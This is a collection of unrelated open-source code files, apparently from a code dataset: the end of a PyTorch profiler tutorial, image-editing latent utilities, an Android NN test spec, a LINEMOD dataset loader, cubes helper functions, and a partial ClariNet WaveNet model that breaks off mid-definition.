# clicking a call stack frame will navigate to the specific code line.
#
# .. image:: ../../_static/img/profiler_vscode.png
# :scale: 25 %
#
#
# - Kernel view
# The GPU kernel view shows all kernels’ time spent on GPU.
#
# .. image:: ../../_static/img/profiler_kernel_view.png
# :scale: 25 %
# Mean Blocks per SM:
# Blocks per SM = Blocks of this kernel / SM number of this GPU.
# If this number is less than 1, it indicates the GPU multiprocessors are not fully utilized.
# "Mean Blocks per SM" is weighted average of all runs of this kernel name, using each run’s duration as weight.
#
# Mean Est. Achieved Occupancy:
# Est. Achieved Occupancy is defined in this column’s tooltip.
# For most cases such as memory bandwidth bounded kernels, the higher the better.
# "Mean Est. Achieved Occupancy" is weighted average of all runs of this kernel name,
# using each run’s duration as weight.
#
# - Trace view
# The trace view shows timeline of profiled operators and GPU kernels.
# You can select it to see details as below.
#
# .. image:: ../../_static/img/profiler_trace_view1.png
# :scale: 25 %
#
# You can move the graph and zoom in/out with the help of right side toolbar.
# And keyboard can also be used to zoom and move around inside the timeline.
# The ‘w’ and ‘s’ keys zoom in centered around the mouse,
# and the ‘a’ and ‘d’ keys move the timeline left and right.
# You can hit these keys multiple times until you see a readable representation.
#
# In this example, we can see the event prefixed with ``enumerate(DataLoader)`` costs a lot of time.
# And during most of this period, the GPU is idle.
# Because this function is loading data and transforming data on host side,
# during which the GPU resource is wasted.
######################################################################
# 5. Improve performance with the help of profiler
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
# At the bottom of "Overview" page, the suggestion in "Performance Recommendation" hints the bottleneck is DataLoader.
# The PyTorch DataLoader uses single process by default.
# User could enable multi-process data loading by setting the parameter ``num_workers``.
# `Here <https://pytorch.org/docs/stable/data.html#single-and-multi-process-data-loading>`_ is more details.
#
# In this example, we follow the "Performance Recommendation" and set ``num_workers`` as below,
# pass a different name such as ``./log/resnet18_4workers`` to ``tensorboard_trace_handler``, and run it again.
#
# ::
#
# train_loader = torch.utils.data.DataLoader(train_set, batch_size=32, shuffle=True, num_workers=4)
#
######################################################################
# Then let’s choose the recently profiled run in left "Runs" dropdown list.
#
# .. image:: ../../_static/img/profiler_overview2.png
# :scale: 25 %
#
# From the above view, we can find the step time is reduced to about 58ms comparing with previous run's 121ms,
# and the time reduction of ``DataLoader`` mainly contributes.
#
# .. image:: ../../_static/img/profiler_trace_view2.png
# :scale: 25 %
#
# From the above view, we can see that the runtime of ``enumerate(DataLoader)`` is reduced,
# and the GPU utilization is increased.
######################################################################
# 6. Analyze performance with other advanced features
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
# - Memory view
# To profile memory, please add ``profile_memory=True`` in arguments of ``torch.profiler.profile``.
#
# Note: Because of the current non-optimized implementation of PyTorch profiler,
# enabling ``profile_memory=True`` will take about several minutes to finish.
# To save time, you can try our existing examples first by running:
#
# ::
#
# tensorboard --logdir=https://torchtbprofiler.blob.core.windows.net/torchtbprofiler/demo/memory_demo
#
# The profiler records all memory allocation/release events during profiling.
# For every specific operator, the plugin aggregates all these memory events inside its life span.
#
# .. image:: ../../_static/img/profiler_memory_view.png
# :scale: 25 %
#
# The memory type could be selected in "Device" selection box.
# For example, "GPU0" means the following table only shows each operator’s memory usage on GPU 0, not including CPU or other GPUs.
#
# The "Size Increase" sums up all allocation bytes and minus all the memory release bytes.
#
# The "Allocation Size" sums up all allocation bytes without considering the memory release.
#
# - Distributed view
# The plugin now supports distributed view on profiling DDP with NCCL as backend.
#
# You can try it by using existing example on Azure:
#
# ::
#
# tensorboard --logdir=https://torchtbprofiler.blob.core.windows.net/torchtbprofiler/demo/distributed_bert
#
# .. image:: ../../_static/img/profiler_distributed_view.png
# :scale: 25 %
#
# The "Computation/Communication Overview" shows computation/communication ratio and their overlapping degree.
# From this view, User can figure out load balance issue among workers.
# For example, if the computation + overlapping time of one worker is much larger than others,
# there may be a problem of load balance or this worker may be a straggler.
#
# The "Synchronizing/Communication Overview" shows the efficiency of communication.
# "Data Transfer Time" is the time for actual data exchanging.
# "Synchronizing Time" is the time for waiting and synchronizing with other workers.
#
# If one worker’s "Synchronizing Time" is much shorter than that of other workers’,
# this worker may be a straggler which may have more computation workload than other workers’.
#
# The "Communication Operations Stats" summarizes the detailed statistics of all communication ops in each worker.
######################################################################
# Learn More
# ----------
#
# Take a look at the following documents to continue your learning,
# and feel free to open an issue `here <https://github.com/pytorch/kineto/issues>`_.
#
# - `Pytorch TensorBoard Profiler github <https://github.com/pytorch/kineto/tree/master/tb_plugin>`_
# - `torch.profiler API <https://pytorch.org/docs/master/profiler.html>`_
|
utils/editor.py | tien1504/idinvert_pytorch | 415 | 10572 | <reponame>tien1504/idinvert_pytorch
# python 3.7
"""Utility functions for image editing from latent space."""
import os.path
import numpy as np
__all__ = [
'parse_indices', 'interpolate', 'mix_style',
'get_layerwise_manipulation_strength', 'manipulate', 'parse_boundary_list'
]
def parse_indices(obj, min_val=None, max_val=None):
"""Parses indices.
If the input is a list or tuple, this function has no effect.
The input can also be a string, which is either a comma separated list of
numbers 'a, b, c', or a dash separated range 'a - c'. Space in the string will
be ignored.
Args:
obj: The input object to parse indices from.
min_val: If not `None`, this function will check that all indices are equal
to or larger than this value. (default: None)
max_val: If not `None`, this function will check that all indices are equal
to or smaller than this field. (default: None)
Returns:
A list of integers.
Raises:
If the input is invalid, i.e., neither a list or tuple, nor a string.
"""
if obj is None or obj == '':
indices = []
elif isinstance(obj, int):
indices = [obj]
elif isinstance(obj, (list, tuple, np.ndarray)):
indices = list(obj)
elif isinstance(obj, str):
indices = []
splits = obj.replace(' ', '').split(',')
for split in splits:
numbers = list(map(int, split.split('-')))
if len(numbers) == 1:
indices.append(numbers[0])
elif len(numbers) == 2:
indices.extend(list(range(numbers[0], numbers[1] + 1)))
else:
raise ValueError(f'Invalid type of input: {type(obj)}!')
assert isinstance(indices, list)
indices = sorted(list(set(indices)))
for idx in indices:
assert isinstance(idx, int)
if min_val is not None:
assert idx >= min_val, f'{idx} is smaller than min val `{min_val}`!'
if max_val is not None:
assert idx <= max_val, f'{idx} is larger than max val `{max_val}`!'
return indices
def interpolate(src_codes, dst_codes, step=5):
"""Interpolates two sets of latent codes linearly.
Args:
src_codes: Source codes, with shape [num, *code_shape].
dst_codes: Target codes, with shape [num, *code_shape].
step: Number of interplolation steps, with source and target included. For
example, if `step = 5`, three more samples will be inserted. (default: 5)
Returns:
Interpolated codes, with shape [num, step, *code_shape].
Raises:
ValueError: If the input two sets of latent codes are with different shapes.
"""
if not (src_codes.ndim >= 2 and src_codes.shape == dst_codes.shape):
raise ValueError(f'Shapes of source codes and target codes should both be '
f'[num, *code_shape], but {src_codes.shape} and '
f'{dst_codes.shape} are received!')
num = src_codes.shape[0]
code_shape = src_codes.shape[1:]
a = src_codes[:, np.newaxis]
b = dst_codes[:, np.newaxis]
l = np.linspace(0.0, 1.0, step).reshape(
[step if axis == 1 else 1 for axis in range(a.ndim)])
results = a + l * (b - a)
assert results.shape == (num, step, *code_shape)
return results
def mix_style(style_codes,
content_codes,
num_layers=1,
mix_layers=None,
is_style_layerwise=True,
is_content_layerwise=True):
"""Mixes styles from style codes to those of content codes.
Each style code or content code consists of `num_layers` codes, each of which
is typically fed into a particular layer of the generator. This function mixes
styles by partially replacing the codes of `content_codes` from some certain
layers with those of `style_codes`.
For example, if both style code and content code are with shape [10, 512],
meaning to have 10 layers and each employs a 512-dimensional latent code. And
the 1st, 2nd, and 3rd layers are the target layers to perform style mixing.
Then the top half of the content code (with shape [3, 512]) will be replaced
by the top half of the style code (also with shape [3, 512]).
NOTE: This function also supports taking single-layer latent codes as inputs,
i.e., setting `is_style_layerwise` or `is_content_layerwise` as False. In this
case, the corresponding code will be first repeated for `num_layers` before
performing style mixing.
Args:
style_codes: Style codes, with shape [num_styles, *code_shape] or
[num_styles, num_layers, *code_shape].
content_codes: Content codes, with shape [num_contents, *code_shape] or
[num_contents, num_layers, *code_shape].
num_layers: Total number of layers in the generative model. (default: 1)
mix_layers: Indices of the layers to perform style mixing. `None` means to
replace all layers, in which case the content code will be completely
replaced by style code. (default: None)
is_style_layerwise: Indicating whether the input `style_codes` are
layer-wise codes. (default: True)
is_content_layerwise: Indicating whether the input `content_codes` are
layer-wise codes. (default: True)
num_layers
Returns:
Codes after style mixing, with shape [num_styles, num_contents, num_layers,
*code_shape].
Raises:
ValueError: If input `content_codes` or `style_codes` is with invalid shape.
"""
if not is_style_layerwise:
style_codes = style_codes[:, np.newaxis]
style_codes = np.tile(
style_codes,
[num_layers if axis == 1 else 1 for axis in range(style_codes.ndim)])
if not is_content_layerwise:
content_codes = content_codes[:, np.newaxis]
content_codes = np.tile(
content_codes,
[num_layers if axis == 1 else 1 for axis in range(content_codes.ndim)])
if not (style_codes.ndim >= 3 and style_codes.shape[1] == num_layers and
style_codes.shape[1:] == content_codes.shape[1:]):
raise ValueError(f'Shapes of style codes and content codes should be '
f'[num_styles, num_layers, *code_shape] and '
f'[num_contents, num_layers, *code_shape] respectively, '
f'but {style_codes.shape} and {content_codes.shape} are '
f'received!')
layer_indices = parse_indices(mix_layers, min_val=0, max_val=num_layers - 1)
if not layer_indices:
layer_indices = list(range(num_layers))
num_styles = style_codes.shape[0]
num_contents = content_codes.shape[0]
code_shape = content_codes.shape[2:]
s = style_codes[:, np.newaxis]
s = np.tile(s, [num_contents if axis == 1 else 1 for axis in range(s.ndim)])
c = content_codes[np.newaxis]
c = np.tile(c, [num_styles if axis == 0 else 1 for axis in range(c.ndim)])
from_style = np.zeros(s.shape, dtype=bool)
from_style[:, :, layer_indices] = True
results = np.where(from_style, s, c)
assert results.shape == (num_styles, num_contents, num_layers, *code_shape)
return results
def get_layerwise_manipulation_strength(num_layers,
truncation_psi,
truncation_layers):
"""Gets layer-wise strength for manipulation.
Recall the truncation trick played on layer [0, truncation_layers):
w = truncation_psi * w + (1 - truncation_psi) * w_avg
So, when using the same boundary to manipulate different layers, layer
[0, truncation_layers) and layer [truncation_layers, num_layers) should use
different strength to eliminate the effect from the truncation trick. More
concretely, the strength for layer [0, truncation_layers) is set as
`truncation_psi`, while that for other layers are set as 1.
"""
strength = [1.0 for _ in range(num_layers)]
if truncation_layers > 0:
for layer_idx in range(0, truncation_layers):
strength[layer_idx] = truncation_psi
return strength
def manipulate(latent_codes,
boundary,
start_distance=-5.0,
end_distance=5.0,
step=21,
layerwise_manipulation=False,
num_layers=1,
manipulate_layers=None,
is_code_layerwise=False,
is_boundary_layerwise=False,
layerwise_manipulation_strength=1.0):
"""Manipulates the given latent codes with respect to a particular boundary.
Basically, this function takes a set of latent codes and a boundary as inputs,
and outputs a collection of manipulated latent codes.
For example, let `step` to be 10, `latent_codes` to be with shape [num,
*code_shape], and `boundary` to be with shape [1, *code_shape] and unit norm.
Then the output will be with shape [num, 10, *code_shape]. For each 10-element
manipulated codes, the first code is `start_distance` away from the original
code (i.e., the input) along the `boundary` direction, while the last code is
`end_distance` away. Remaining codes are linearly interpolated. Here,
`distance` is sign sensitive.
NOTE: This function also supports layer-wise manipulation, in which case the
generator should be able to take layer-wise latent codes as inputs. For
example, if the generator has 18 convolutional layers in total, and each of
which takes an independent latent code as input. It is possible, sometimes
with even better performance, to only partially manipulate these latent codes
corresponding to some certain layers yet keeping others untouched.
NOTE: Boundary is assumed to be normalized to unit norm already.
Args:
latent_codes: The input latent codes for manipulation, with shape
[num, *code_shape] or [num, num_layers, *code_shape].
boundary: The semantic boundary as reference, with shape [1, *code_shape] or
[1, num_layers, *code_shape].
start_distance: Start point for manipulation. (default: -5.0)
end_distance: End point for manipulation. (default: 5.0)
step: Number of manipulation steps. (default: 21)
layerwise_manipulation: Whether to perform layer-wise manipulation.
(default: False)
num_layers: Number of layers. Only active when `layerwise_manipulation` is
set as `True`. Should be a positive integer. (default: 1)
manipulate_layers: Indices of the layers to perform manipulation. `None`
means to manipulate latent codes from all layers. (default: None)
is_code_layerwise: Whether the input latent codes are layer-wise. If set as
`False`, the function will first repeat the input codes for `num_layers`
times before perform manipulation. (default: False)
is_boundary_layerwise: Whether the input boundary is layer-wise. If set as
`False`, the function will first repeat boundary for `num_layers` times
before perform manipulation. (default: False)
layerwise_manipulation_strength: Manipulation strength for each layer. Only
active when `layerwise_manipulation` is set as `True`. This field can be
used to resolve the strength discrepancy across layers when truncation
trick is on. See function `get_layerwise_manipulation_strength()` for
details. A tuple, list, or `numpy.ndarray` is expected. If set as a single
number, this strength will be used for all layers. (default: 1.0)
Returns:
Manipulated codes, with shape [num, step, *code_shape] if
`layerwise_manipulation` is set as `False`, or shape [num, step,
num_layers, *code_shape] if `layerwise_manipulation` is set as `True`.
Raises:
ValueError: If the input latent codes, boundary, or strength are with
invalid shape.
"""
if not (boundary.ndim >= 2 and boundary.shape[0] == 1):
raise ValueError(f'Boundary should be with shape [1, *code_shape] or '
f'[1, num_layers, *code_shape], but '
f'{boundary.shape} is received!')
if not layerwise_manipulation:
assert not is_code_layerwise
assert not is_boundary_layerwise
num_layers = 1
manipulate_layers = None
layerwise_manipulation_strength = 1.0
# Preprocessing for layer-wise manipulation.
# Parse indices of manipulation layers.
layer_indices = parse_indices(
manipulate_layers, min_val=0, max_val=num_layers - 1)
if not layer_indices:
layer_indices = list(range(num_layers))
# Make latent codes layer-wise if needed.
assert num_layers > 0
if not is_code_layerwise:
x = latent_codes[:, np.newaxis]
x = np.tile(x, [num_layers if axis == 1 else 1 for axis in range(x.ndim)])
else:
x = latent_codes
if x.shape[1] != num_layers:
raise ValueError(f'Latent codes should be with shape [num, num_layers, '
f'*code_shape], where `num_layers` equals to '
f'{num_layers}, but {x.shape} is received!')
# Make boundary layer-wise if needed.
if not is_boundary_layerwise:
b = boundary
b = np.tile(b, [num_layers if axis == 0 else 1 for axis in range(b.ndim)])
else:
b = boundary[0]
if b.shape[0] != num_layers:
raise ValueError(f'Boundary should be with shape [num_layers, '
f'*code_shape], where `num_layers` equals to '
f'{num_layers}, but {b.shape} is received!')
# Get layer-wise manipulation strength.
if isinstance(layerwise_manipulation_strength, (int, float)):
s = [float(layerwise_manipulation_strength) for _ in range(num_layers)]
elif isinstance(layerwise_manipulation_strength, (list, tuple)):
s = layerwise_manipulation_strength
if len(s) != num_layers:
raise ValueError(f'Shape of layer-wise manipulation strength `{len(s)}` '
f'mismatches number of layers `{num_layers}`!')
elif isinstance(layerwise_manipulation_strength, np.ndarray):
s = layerwise_manipulation_strength
if s.size != num_layers:
raise ValueError(f'Shape of layer-wise manipulation strength `{s.size}` '
f'mismatches number of layers `{num_layers}`!')
else:
raise ValueError(f'Unsupported type of `layerwise_manipulation_strength`!')
s = np.array(s).reshape(
[num_layers if axis == 0 else 1 for axis in range(b.ndim)])
b = b * s
if x.shape[1:] != b.shape:
raise ValueError(f'Latent code shape {x.shape} and boundary shape '
f'{b.shape} mismatch!')
num = x.shape[0]
code_shape = x.shape[2:]
x = x[:, np.newaxis]
b = b[np.newaxis, np.newaxis, :]
l = np.linspace(start_distance, end_distance, step).reshape(
[step if axis == 1 else 1 for axis in range(x.ndim)])
results = np.tile(x, [step if axis == 1 else 1 for axis in range(x.ndim)])
is_manipulatable = np.zeros(results.shape, dtype=bool)
is_manipulatable[:, :, layer_indices] = True
results = np.where(is_manipulatable, x + l * b, results)
assert results.shape == (num, step, num_layers, *code_shape)
return results if layerwise_manipulation else results[:, :, 0]
def parse_boundary_list(boundary_list_path):
"""Parses boundary list.
Sometimes, a text file containing a list of boundaries will significantly
simplify image manipulation with a large amount of boundaries. This function
is used to parse boundary information from such list file.
Basically, each item in the list should be with format
`($NAME, $SPACE_TYPE): $PATH`. `DISABLE` at the beginning of the line can
disable a particular boundary.
Sample:
(age, z): $AGE_BOUNDARY_PATH
(gender, w): $GENDER_BOUNDARY_PATH
DISABLE(pose, wp): $POSE_BOUNDARY_PATH
Args:
boundary_list_path: Path to the boundary list.
Returns:
A dictionary, whose key is a two-element tuple (boundary_name, space_type)
and value is the corresponding boundary path.
Raise:
ValueError: If the given boundary list does not exist.
"""
if not os.path.isfile(boundary_list_path):
raise ValueError(f'Boundary list `boundary_list_path` does not exist!')
boundaries = {}
with open(boundary_list_path, 'r') as f:
for line in f:
if line[:len('DISABLE')] == 'DISABLE':
continue
boundary_info, boundary_path = line.strip().split(':')
boundary_name, space_type = boundary_info.strip()[1:-1].split(',')
boundary_name = boundary_name.strip()
space_type = space_type.strip().lower()
boundary_path = boundary_path.strip()
boundaries[(boundary_name, space_type)] = boundary_path
return boundaries
|
test/cts/tool/CTSConverter/src/nn/specs/V1_1/depthwise_conv2d_float_weights_as_inputs_relaxed.mod.py | zhaoming0/webml-polyfill | 255 | 10586 | #
# Copyright (C) 2018 The Android Open Source Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
model = Model()
i1 = Input("op1", "TENSOR_FLOAT32", "{1, 3, 3, 2}")
f1 = Input("op2", "TENSOR_FLOAT32", "{1, 2, 2, 4}")
b1 = Input("op3", "TENSOR_FLOAT32", "{4}")
pad0 = Int32Scalar("pad0", 0)
act = Int32Scalar("act", 0)
stride = Int32Scalar("stride", 1)
cm = Int32Scalar("channelMultiplier", 2)
output = Output("op4", "TENSOR_FLOAT32", "{1, 2, 2, 4}")
model = model.Operation("DEPTHWISE_CONV_2D",
i1, f1, b1,
pad0, pad0, pad0, pad0,
stride, stride,
cm, act).To(output)
model = model.RelaxedExecution(True)
# Example 1. Input in operand 0,
input0 = {i1: # input 0
[10, 21, 10, 22, 10, 23,
10, 24, 10, 25, 10, 26,
10, 27, 10, 28, 10, 29],
f1:
[.25, 0, .2, 0,
.25, 0, 0, .3,
.25, 0, 0, 0,
.25, .1, 0, 0],
b1:
[1, 2, 3, 4]}
# (i1 (conv) f1) + b1
# filter usage:
# in_ch1 * f_1 --> output_d1
# in_ch1 * f_2 --> output_d2
# in_ch2 * f_3 --> output_d3
# in_ch3 * f_4 --> output_d4
output0 = {output: # output 0
[11, 3, 7.2, 10.6,
11, 3, 7.4, 10.9,
11, 3, 7.8, 11.5,
11, 3, 8.0, 11.8]}
# Instantiate an example
Example((input0, output0))
|
single-shot-pose/lib/linemod_dataset.py | take-cheeze/models | 112 | 10602 | <gh_stars>100-1000
import numpy as np
import os
from chainercv.chainer_experimental.datasets.sliceable import GetterDataset
from chainercv.utils import read_image
linemod_object_diameters = {
'ape': 0.103,
'benchvise': 0.286908,
'cam': 0.173,
'can': 0.202,
'cat': 0.155,
'driller': 0.262,
'duck': 0.109,
'eggbox': 0.176364,
'glue': 0.176,
'holepuncher': 0.162,
'iron': 0.303153,
'lamp': 0.285155,
'phone': 0.213}
class LinemodDataset(GetterDataset):
def __init__(self, base_dir, obj_name='ape', split='train',
return_msk=False):
super(LinemodDataset, self).__init__()
split_path = os.path.join(
base_dir, 'LINEMOD', obj_name, '{}.txt'.format(split))
self.base_dir = base_dir
with open(split_path, 'r') as f:
self.img_paths = f.readlines()
self.add_getter(('img', 'point', 'label'), self._get_example)
if return_msk:
self.add_getter('msk', self._get_msk)
def __len__(self):
return len(self.img_paths)
def _get_example(self, i):
img_path = os.path.join(self.base_dir, self.img_paths[i].rstrip())
img = read_image(img_path)
anno_path = img_path.replace(
'images', 'labels').replace(
'JPEGImages', 'labels').replace(
'.jpg', '.txt').replace('.png', '.txt')
anno = np.zeros(50*21)
if os.path.getsize(anno_path):
_, H, W = img.shape
tmp = read_truths_args(anno_path, 8.0/W)
size = tmp.size
if size > 50*21:
anno = tmp[0:50*21]
elif size > 0:
anno[0:size] = tmp
anno = anno.reshape(-1, 21)
anno = anno[:truths_length(anno)]
point = anno[:, 1:19].reshape(-1, 9, 2).astype(np.float32)
point[:, :, 0] *= W
point[:, :, 1] *= H
label = anno[:, 0].astype(np.int32)
return img, point, label
def _get_msk(self, i):
img_path = os.path.join(self.base_dir, self.img_paths[i].rstrip())
mskpath = img_path.replace('JPEGImages', 'mask').replace(
'/00', '/').replace('.jpg', '.png')
msk = read_image(mskpath, color=False)[0]
return msk > 0
def truths_length(truths):
for i in range(50):
if truths[i][1] == 0:
return i
def read_truths(lab_path):
if os.path.getsize(lab_path):
truths = np.loadtxt(lab_path)
# to avoid single truth problem
truths = truths.reshape(truths.size//21, 21)
return truths
else:
return np.array([])
def read_truths_args(lab_path, min_box_scale):
truths = read_truths(lab_path)
new_truths = []
for i in range(truths.shape[0]):
new_truths.append(
[truths[i][0], truths[i][1], truths[i][2],
truths[i][3], truths[i][4], truths[i][5],
truths[i][6], truths[i][7], truths[i][8],
truths[i][9], truths[i][10], truths[i][11],
truths[i][12], truths[i][13], truths[i][14],
truths[i][15], truths[i][16], truths[i][17],
truths[i][18]])
return np.array(new_truths)
|
cubes/common.py | digitalsatori/cubes | 1,020 | 10616 | # -*- encoding: utf-8 -*-
"""Utility functions for computing combinations of dimensions and hierarchy
levels"""
from __future__ import absolute_import
import re
import os.path
import json
from collections import OrderedDict
from .errors import ModelInconsistencyError, ArgumentError, ConfigurationError
from . import compat
__all__ = [
"IgnoringDictionary",
"MissingPackage",
"localize_common",
"localize_attributes",
"get_localizable_attributes",
"decamelize",
"to_identifier",
"assert_instance",
"assert_all_instances",
"read_json_file",
"sorted_dependencies",
]
class IgnoringDictionary(OrderedDict):
"""Simple dictionary extension that will ignore any keys of which values
are empty (None/False)"""
def __setitem__(self, key, value):
if value is not None:
super(IgnoringDictionary, self).__setitem__(key, value)
def set(self, key, value):
"""Sets `value` for `key` even if value is null."""
super(IgnoringDictionary, self).__setitem__(key, value)
def __repr__(self):
items = []
for key, value in self.items():
item = '%s: %s' % (repr(key), repr(value))
items.append(item)
return "{%s}" % ", ".join(items)
def assert_instance(obj, class_, label):
"""Raises ArgumentError when `obj` is not instance of `cls`"""
if not isinstance(obj, class_):
raise ModelInconsistencyError("%s should be sublcass of %s, "
"provided: %s" % (label,
class_.__name__,
type(obj).__name__))
def assert_all_instances(list_, class_, label="object"):
"""Raises ArgumentError when objects in `list_` are not instances of
`cls`"""
for obj in list_ or []:
assert_instance(obj, class_, label="object")
class MissingPackageError(Exception):
"""Exception raised when encountered a missing package."""
pass
class MissingPackage(object):
"""Bogus class to handle missing optional packages - packages that are not
necessarily required for Cubes, but are needed for certain features."""
def __init__(self, package, feature = None, source = None, comment = None):
self.package = package
self.feature = feature
self.source = source
self.comment = comment
def __call__(self, *args, **kwargs):
self._fail()
def __getattr__(self, name):
self._fail()
def _fail(self):
if self.feature:
use = " to be able to use: %s" % self.feature
else:
use = ""
if self.source:
source = " from %s" % self.source
else:
source = ""
if self.comment:
comment = ". %s" % self.comment
else:
comment = ""
raise MissingPackageError("Optional package '%s' is not installed. "
"Please install the package%s%s%s" %
(self.package, source, use, comment))
def optional_import(name, feature=None, source=None, comment=None):
"""Optionally import package `name`. If package does not exist, import a
placeholder object, that raises an exception with more detailed
description about the missing package."""
try:
return __import__(name)
except ImportError:
return MissingPackage(name, feature, source, comment)
def expand_dictionary(record, separator='.'):
"""Return expanded dictionary: treat keys are paths separated by
`separator`, create sub-dictionaries as necessary"""
result = {}
for key, value in record.items():
current = result
path = key.split(separator)
for part in path[:-1]:
if part not in current:
current[part] = {}
current = current[part]
current[path[-1]] = value
return result
def localize_common(obj, trans):
"""Localize common attributes: label and description"""
if "label" in trans:
obj.label = trans["label"]
if "description" in trans:
obj.description = trans["description"]
def localize_attributes(attribs, translations):
"""Localize list of attributes. `translations` should be a dictionary with
keys as attribute names, values are dictionaries with localizable
attribute metadata, such as ``label`` or ``description``."""
for (name, atrans) in translations.items():
attrib = attribs[name]
localize_common(attrib, atrans)
def get_localizable_attributes(obj):
"""Returns a dictionary with localizable attributes of `obj`."""
# FIXME: use some kind of class attribute to get list of localizable attributes
locale = {}
try:
if obj.label:
locale["label"] = obj.label
except:
pass
try:
if obj.description:
locale["description"] = obj.description
except:
pass
return locale
def decamelize(name):
s1 = re.sub('(.)([A-Z][a-z]+)', r'\1 \2', name)
return re.sub('([a-z0-9])([A-Z])', r'\1 \2', s1)
def to_identifier(name):
return re.sub(r' ', r'_', name).lower()
def to_label(name, capitalize=True):
"""Converts `name` into label by replacing underscores by spaces. If
`capitalize` is ``True`` (default) then the first letter of the label is
capitalized."""
label = name.replace("_", " ")
if capitalize:
label = label.capitalize()
return label
def coalesce_option_value(value, value_type, label=None):
"""Convert string into an object value of `value_type`. The type might be:
`string` (no conversion), `integer`, `float`, `list` – comma separated
list of strings.
"""
value_type = value_type.lower()
try:
if value_type in ('string', 'str'):
return_value = str(value)
elif value_type == 'list':
if isinstance(value, compat.string_type):
return_value = value.split(",")
else:
return_value = list(value)
elif value_type == "float":
return_value = float(value)
elif value_type in ["integer", "int"]:
return_value = int(value)
elif value_type in ["bool", "boolean"]:
if not value:
return_value = False
elif isinstance(value, compat.string_type):
return_value = value.lower() in ["1", "true", "yes", "on"]
else:
return_value = bool(value)
else:
raise ArgumentError("Unknown option value type %s" % value_type)
except ValueError:
if label:
label = "parameter %s " % label
else:
label = ""
raise ArgumentError("Unable to convert %svalue '%s' into type %s" %
(label, astring, value_type))
return return_value
def coalesce_options(options, types):
"""Coalesce `options` dictionary according to types dictionary. Keys in
`types` refer to keys in `options`, values of `types` are value types:
string, list, float, integer or bool."""
out = {}
for key, value in options.items():
if key in types:
out[key] = coalesce_option_value(value, types[key], key)
else:
out[key] = value
return out
def read_json_file(path, kind=None):
"""Read a JSON from `path`. This is convenience function that provides
more descriptive exception handling."""
kind = "%s " % str(kind) if kind else ""
if not os.path.exists(path):
raise ConfigurationError("Can not find %sfile '%s'"
% (kind, path))
try:
f = compat.open_unicode(path)
except IOError:
raise ConfigurationError("Can not open %sfile '%s'"
% (kind, path))
try:
content = json.load(f)
except ValueError as e:
raise SyntaxError("Syntax error in %sfile %s: %s"
% (kind, path, str(e)))
finally:
f.close()
return content
def sorted_dependencies(graph):
"""Return keys from `deps` ordered by dependency (topological sort).
`deps` is a dictionary where keys are strings and values are list of
strings where keys is assumed to be dependant on values.
Example::
A ---> B -+--> C
|
+--> D --> E
Will be: ``{"A": ["B"], "B": ["C", "D"], "D": ["E"],"E": []}``
"""
graph = dict((key, set(value)) for key, value in graph.items())
# L ← Empty list that will contain the sorted elements
L = []
# S ← Set of all nodes with no dependencies (incoming edges)
S = set(parent for parent, req in graph.items() if not req)
while S:
# remove a node n from S
n = S.pop()
# insert n into L
L.append(n)
# for each node m with an edge e from n to m do
# (n that depends on m)
parents = [parent for parent, req in graph.items() if n in req]
for parent in parents:
graph[parent].remove(n)
# remove edge e from the graph
# if m has no other incoming edges then insert m into S
if not graph[parent]:
S.add(parent)
# if graph has edges then -> error
nonempty = [k for k, v in graph.items() if v]
if nonempty:
raise ArgumentError("Cyclic dependency of: %s"
% ", ".join(nonempty))
return L
|
wavenet_iaf.py | Ella77/ClariNet | 126 | 10617 | import torch
import torch.nn as nn
import torch.nn.functional as F
from modules import Conv, ResBlock
class Wavenet_Student(nn.Module):
def __init__(self, num_blocks_student=[1, 1, 1, 1, 1, 1], num_layers=10,
front_channels=32, residual_channels=64, gate_channels=128, skip_channels=64,
kernel_size=3, cin_channels=80, causal=True):
super(Wavenet_Student, self).__init__()
self.num_blocks = num_blocks_student
self.num_flow = len(self.num_blocks)
self.num_layers = num_layers
self.iafs = nn.ModuleList()
for i in range(self.num_flow):
self.iafs.append(Wavenet_Flow(out_channels=2,
num_blocks=self.num_blocks[i], num_layers=self.num_layers,
front_channels=front_channels, residual_channels=residual_channels,
gate_channels=gate_channels, skip_channels=skip_channels,
kernel_size=kernel_size, cin_channels=cin_channels, causal=causal))
def forward(self, z, c):
return self.iaf(z, c)
def iaf(self, z, c_up):
mu_tot, logs_tot = 0., 0.
for i, iaf in enumerate(self.iafs):
mu_logs = iaf(z, c_up)
mu = mu_logs[:, 0:1, :-1]
logs = mu_logs[:, 1:, :-1]
mu_tot = mu_tot * torch.exp(logs) + mu
logs_tot = logs_tot + logs
z = z[:, :, 1:] * torch.exp(logs) + mu
z = F.pad(z, pad=(1, 0), mode='constant', value=0)
return z, mu_tot, logs_tot
def receptive_field(self):
receptive_field = 1
for iaf in self.iafs:
receptive_field += iaf.receptive_field_size() - 1
return receptive_field
def generate(self, z, c_up):
x, _, _ = self.iaf(z, c_up)
return x
def remove_weight_norm(self):
for iaf in self.iafs:
iaf.remove_weight_norm()
class Wavenet_Flow(nn.Module):
def __init__(self, out_channels=1, num_blocks=1, num_layers=10,
front_channels=32, residual_channels=64, gate_channels=32, skip_channels=None,
kernel_size=3, cin_channels=80, causal=True):
super(Wavenet_Flow, self). __init__()
self.causal = causal
self.num_blocks = num_blocks
self.num_layers = num_layers
self.front_channels = front_channels
self.out_channels = out_channels
self.gate_channels = gate_channels
self.residual_channels = residual_channels
self.skip_channels = skip_channels
self.cin_channels = cin_channels
self.kernel_size = kernel_size
self.front_conv = nn.Sequential(
Conv(1, self.residual_channels, self.front_channels, causal=self.causal),
nn.ReLU()
)
self.res_blocks = nn.ModuleList()
self.res_blocks_fast = nn.ModuleList()
for b in range(self.num_blocks):
for n in range(self.num_layers):
self.res_blocks.append(ResBlock(self.residual_channels, self.gate_channels, self.skip_channels,
self.kernel_size, dilation=2**n,
cin_channels=self.cin_channels, local_conditioning=True,
causal=self.causal, mode='SAME'))
self.final_conv = nn.Sequential(
nn.ReLU(),
Conv(self.skip_channels, self.skip_channels, 1, causal=self.causal),
